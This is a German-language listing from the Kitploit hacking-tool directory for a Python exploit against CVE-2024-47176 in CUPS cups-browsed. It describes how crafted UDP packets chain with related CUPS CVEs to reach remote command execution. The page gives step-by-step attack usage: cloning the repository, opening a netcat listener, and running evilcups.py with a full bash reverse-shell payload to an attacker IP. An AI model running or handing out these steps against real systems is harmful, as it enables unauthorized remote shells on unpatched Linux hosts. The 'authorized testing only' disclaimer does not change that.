Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-47176 — Python-Exploit für CVE-2024-47176, das Remote-Befehlsausführung in CUPS cups-browsed mittels präparierter UDP-Pakete erreicht. Enthält Reverse-Shell-Payload-Zustellung für autorisierte Penetrationstests. | Kitploit
Tools/GitHubGitHub/gumerzzzindo/cve-2024-47176
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsCommand and ControlRemote-Access-Tool
GitHubgumerzzzindo/cve-2024-47176

CVE-2024-47176

Python-Exploit für CVE-2024-47176, das Remote-Befehlsausführung in CUPS cups-browsed mittels präparierter UDP-Pakete erreicht. Enthält Reverse-Shell-Payload-Zustellung für autorisierte Penetrationstests.

Repository anzeigen
vor 2 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2024-47176 — Remote-Befehlsausführung in CUPS

CVE CVSS Python Platform License

Nur für Bildungszwecke und autorisierte Penetrationstests.


Inhaltsverzeichnis

  • Beschreibung
  • Betroffene Systeme
  • Verwandte CVEs
  • Voraussetzungen
  • Einrichtung
  • Verwendung
  • Haftungsausschluss

Beschreibung

CUPS (Common UNIX Printing System) ist ein Open-Source-Drucksystem, das vernetzte Drucker verwaltet. CVE-2024-47176 zielt auf den cups-browsed-Daemon ab, der an INADDR_ANY:631 bindet und Paketen aus jeder Quelle blind vertraut.

Durch das Erstellen eines bösartigen UDP-Pakets, das eine Get-Printer-Attributes-IPP-Anforderung auslöst, kann ein Angreifer bewirken, dass cups-browsed eine Verbindung zu einem angreifergesteuerten Server herstellt – und in Kombination mit den untenstehenden Schwachstellen eine beliebige Remote-Befehlsausführung erreicht.


Betroffene Systeme

KomponenteBedingung
cups-browsedHört auf UDP 631 (Standard)
CUPS < 2.4.11Nicht gepatchte Versionen
Linux-Systeme mit exponiertem CUPSPort 631 vom Angreifer erreichbar

Verwandte CVEs


Voraussetzungen

  • Zielmaschine mit freigegebenem Port 631 (IPP/UDP)
  • Python 3.x auf Ihrem Angriffsrechner
  • nmap (optional, zur Aufklärung)
  • Ein Netcat-Listener für die Reverse Shell

Einrichtung

1. Repository klonen:

root@kitploit:~
git clone https://github.com/gumerzzzindo/cve-2024-47176.git
cd cve-2024-47176

2. Erforderliche Python-Abhängigkeit installieren:

root@kitploit:~
pip install ippserver

3. Einen Listener auf Ihrem Rechner starten:

root@kitploit:~
nc -lvnp <PORT>

Verwendung

root@kitploit:~
./evilcups.py <ATTACKER_IP> <TARGET_IP> "<COMMAND>"

Beispiel – Reverse Shell:

root@kitploit:~
./evilcups.py 10.10.10.10 10.10.11.40 "bash -c 'bash -i >& /dev/tcp/10.10.10.10/4444 0>&1'"

Nach dem Ausführen des Exploits lösen Sie einen Druckauftrag auf dem Ziel aus (oder warten Sie auf eine automatische Überprüfung), um die Nutzlast auszuführen.


Haftungsausschluss

Dieses Repository ist ausschließlich für Bildungszwecke und autorisierte Sicherheitsforschung gedacht. Die Verwendung dieses Tools gegen Systeme, die Sie nicht besitzen oder für die Sie keine ausdrückliche schriftliche Genehmigung zum Testen haben, ist illegal und unethisch.

Tool herunterladen
CVEBeschreibung
CVE-2024-47176cups-browsed vertraut jedem UDP-Paket auf Port 631
CVE-2024-47076libcupsfilters bereinigt IPP-Attribute nicht
CVE-2024-47175libppd fügt nicht bereinigte Daten in PPD-Dateien ein
CVE-2024-47177cups-filters ermöglicht Befehlsausführung über PPD